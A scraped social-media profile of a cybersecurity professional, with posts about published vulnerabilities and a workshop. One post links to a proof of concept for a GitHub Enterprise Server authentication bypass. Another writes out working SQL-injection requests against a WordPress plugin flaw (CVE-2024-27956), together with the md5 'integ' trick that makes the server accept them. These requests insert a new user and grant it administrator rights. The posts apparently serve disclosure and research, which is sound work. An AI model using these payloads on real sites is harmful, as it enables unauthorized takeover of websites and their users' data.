

🔥Poc CVE-2024-4985 #Bypass authentication #GitHub Enterprise Server github.com/absholi7ly/Byp… @HunterMapping @the_yellow_fall @fofabot @Dinosn
Josmell Chavarri
1.3K posts

@j0sm3ll
Cybersecurity Professional | InfoSec “Lee y conducirás, no leas y serás conducido”.


🔥Poc CVE-2024-4985 #Bypass authentication #GitHub Enterprise Server github.com/absholi7ly/Byp… @HunterMapping @the_yellow_fall @fofabot @Dinosn



Today, I took a few minutes to analyze the #WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) #security #vulnerability. Turns out it is super easy to exploit. Here is a basic PoC: Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. Adding a new WordPress user: q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28 Giving the user admin rights: q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c Get pwned: Note: Param "integ" is the md5sum of the query.















Seguimos en la sala 19 con el "Taller de detección de amenazas y respuesta activa" impartido por Edgar David Salazar y Josmell Antonio Chávarri, ambos profesionales de @GuayoyoCyber #XVIIJornadasCCNCERT #VJornadasESPDEFCERT #RootedLabs





